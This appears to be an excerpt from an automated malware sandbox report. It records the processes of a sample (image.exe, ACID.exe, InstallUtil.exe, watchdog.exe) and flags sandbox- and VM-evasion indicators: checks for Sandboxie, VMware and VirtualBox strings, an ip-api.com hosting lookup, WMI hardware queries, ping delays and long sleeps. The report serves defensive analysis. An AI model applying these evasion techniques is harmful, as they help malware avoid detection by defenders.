                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara match | File source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: OutputDebugStringW count: 128
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 2B70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 4B70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 5D40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 53B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 7120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 8120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Memory allocated: 8380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 13E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 2FA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 2DA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 6100000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 5870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 75E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory allocated: 85E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 1700000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 3050000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 5050000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 2290000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 22D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 42D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 1120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 2EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Memory allocated: 2C60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\image.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599327
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599165
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598265
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\image.exe | Window / User API: threadDelayed 1836
                    Source: C:\Users\user\Desktop\image.exe | Window / User API: threadDelayed 6685
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Window / User API: threadDelayed 2250
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Window / User API: threadDelayed 7346
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 2152
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 713
                    Source: C:\Users\user\Desktop\image.exe TID: 2304 | Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Users\user\Desktop\image.exe TID: 6472 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 3708 | Thread sleep time: -71000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 1804 | Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 776 | Thread sleep time: -53000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940 | Thread sleep count: 2152 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940 | Thread sleep count: 713 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599327s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -599165s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -598968s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -598734s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -598531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -598265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99467s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99225s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -99000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -98890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040 | Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe TID: 2588 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599165Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99467Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99225Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: image.exe, 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
